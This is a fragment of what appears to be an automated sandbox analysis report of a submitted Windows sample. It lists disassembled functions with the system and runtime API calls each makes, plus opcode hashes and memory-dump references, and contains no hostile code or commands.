                                                                                                                                                                            • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2880819207-0
                                                                                                                                                                            • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                                                                            • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                                                                                                            • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                                                                            • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                                                                                                            • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 357397906-0
                                                                                                                                                                            • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                                                                            • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                                                                                                            • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                                                                            • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3016257755-0
                                                                                                                                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                            • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                                                                                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                            • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                                                                                                                            APIs
                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00436AB0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1187119602-0
                                                                                                                                                                            • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                                                                            • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                                                                            • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1597257046-0
                                                                                                                                                                            • Opcode ID: ef4c8eb1668fb764ac9879486c39433899b48e1b70f0ed706df85b8b39ec7f0c
                                                                                                                                                                            • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                                                                                                                            • Opcode Fuzzy Hash: ef4c8eb1668fb764ac9879486c39433899b48e1b70f0ed706df85b8b39ec7f0c
                                                                                                                                                                            • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DeleteDestroyObject$IconWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3349847261-0
                                                                                                                                                                            • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                                                                            • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                                                                                                                            • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                                                                            • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                                                                                                                            APIs
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2223660684-0
                                                                                                                                                                            • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                                                                            • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                                                                                                                            • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                                                                            • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                            • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                                                                                                                            • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                                                                                                                            • EndPath.GDI32(?), ref: 004472B0
                                                                                                                                                                            • StrokePath.GDI32(?), ref: 004472BE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2783949968-0
                                                                                                                                                                            • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                                                                            • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                                                                                                            • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                                                                            • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                                                                                                            APIs
                                                                                                                                                                            • __getptd.LIBCMT ref: 00417D1A
                                                                                                                                                                              • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                                                                              • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                                                                            • __getptd.LIBCMT ref: 00417D31
                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 00417D3F
                                                                                                                                                                            • __lock.LIBCMT ref: 00417D4F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3521780317-0
                                                                                                                                                                            • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                                                                                            • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                                                                                            • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00471144
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0047114D
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                            • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                                                                            • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                                                                                                                            • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                                                                            • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00471102
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0047110B
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                            • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                                                                            • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                                                                                                                            • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                                                                            • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                                                                            • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2710830443-0
                                                                                                                                                                            • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                                                                            • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                                                                                                                            • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                                                                            • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                                                                                                                            APIs
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                                                                                                              • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                                                                                                              • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                            • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                                                                            • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                                                                                                                            • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                                                                            • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                                                                                                                            APIs
                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                                                                                                              • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                                                                            • __getptd_noexit.LIBCMT ref: 00414080
                                                                                                                                                                            • __freeptd.LIBCMT ref: 0041408A
                                                                                                                                                                            • ExitThread.KERNEL32 ref: 00414093
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3182216644-0
                                                                                                                                                                            • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                                                                            • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                                                                                                                            • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                                                                            • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
